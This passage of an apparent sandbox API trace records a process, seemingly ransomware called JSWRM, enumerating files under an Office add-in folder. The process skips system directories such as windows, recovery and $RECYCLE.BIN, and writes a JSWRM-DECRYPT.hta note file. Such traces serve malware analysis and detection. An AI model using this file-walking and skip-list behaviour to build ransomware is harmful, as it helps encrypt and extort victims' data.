ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.182] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244978 | out: hHeap=0x1e0000) returned 1 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.182] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa89f599, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8caa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.182] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.183] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.183] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa89f599, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8caa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.183] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.183] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ja", cAlternateFileName="")) returned 1 [0123.183] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0123.183] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0123.183] lstrcmpiW (lpString1="ja", lpString2="...") returned 1 [0123.183] lstrcmpiW (lpString1="ja", lpString2="windows") returned -1 [0123.184] lstrcmpiW (lpString1="ja", lpString2="recovery") returned -1 [0123.184] lstrcmpiW (lpString1="ja", lpString2="perflogs") returned -1 [0123.184] lstrcmpiW (lpString1="ja", lpString2="documents and settings") returned 1 [0123.184] lstrcmpiW (lpString1="ja", lpString2="$RECYCLE.BIN") returned 1 [0123.184] lstrcmpiW (lpString1="ja", lpString2="system volume information") returned -1 [0123.184] lstrcmpiW (lpString1="ja", lpString2="msocache") returned -1 [0123.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ja\\jswrm-decrypt.hta")) returned 0xffffffff [0123.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ja\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.186] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.186] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.187] CloseHandle (hObject=0x338) returned 1 [0123.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ja\\jswrm-decrypt.hta")) returned 0x20 [0123.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.188] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ja\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4014e432, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232100 [0123.188] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.188] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4014e432, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.188] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4014e432, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4014e432, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4017464c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.188] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.189] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d05722, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.189] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x91adba5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91d3da7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.189] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.190] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 